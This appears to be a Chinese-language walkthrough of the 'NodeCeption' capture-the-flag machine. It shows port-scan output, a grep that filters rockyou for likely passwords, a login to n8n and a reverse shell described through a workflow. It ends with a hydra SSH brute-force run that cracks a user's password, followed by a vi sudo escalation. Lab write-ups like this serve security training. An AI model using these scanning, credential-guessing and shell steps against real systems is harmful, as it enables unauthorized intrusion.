NodeCeption

信息搜集

192.168.100.57

端口扫描

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.57
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.57:22
Open 192.168.100.57:5678
Open 192.168.100.57:8765
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 14:48 +0800
Initiating ARP Ping Scan at 14:48
Scanning 192.168.100.57 [1 port]
Completed ARP Ping Scan at 14:48, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:48
Completed Parallel DNS resolution of 1 host. at 14:48, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 14:48
Scanning 192.168.100.57 [3 ports]
Discovered open port 22/tcp on 192.168.100.57
Discovered open port 5678/tcp on 192.168.100.57
Discovered open port 8765/tcp on 192.168.100.57
Completed SYN Stealth Scan at 14:48, 0.01s elapsed (3 total ports)
Nmap scan report for 192.168.100.57
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-03-26 14:48:12 CST for 0s

PORT     STATE SERVICE        REASON
22/tcp   open  ssh            syn-ack ttl 64
5678/tcp open  rrac           syn-ack ttl 64
8765/tcp open  ultraseek-http syn-ack ttl 64
MAC Address: 08:00:27:3B:87:02 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

5678是N8N

8765是Apache默认页面

‍

枚举 8765

在网页源码注释中可以看到给出了hint

邮箱是usuario@maildelctf.com

密码长度至少 8 位，至少包含 1 个数字和 1 个大写字母

大概率是N8N的登录账号密码

现在需要处理密码，这里使用的是从rockyou中提取

1	head -n 5000 /usr/share/wordlists/rockyou.txt \| grep -P '^(?=.\d)(?=.[A-Z]).{8,}$'

前5000个就两个，经过尝试发现第一个就符合(Password1)

‍

利用 N8N

利用N8N的工作流进行反弹shell

提权

thl -> root

sudo -l

存在vi提权同样在Gtfbins中有方案

https://gtfobins.org/gtfobins/vi/

但是sudo需要密码

hydra爆破

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# hydra -l thl -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.57
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-26 15:30:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.100.57:22/
[22][ssh] host: 192.168.100.57   login: thl   password: basketball
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-26 15:31:03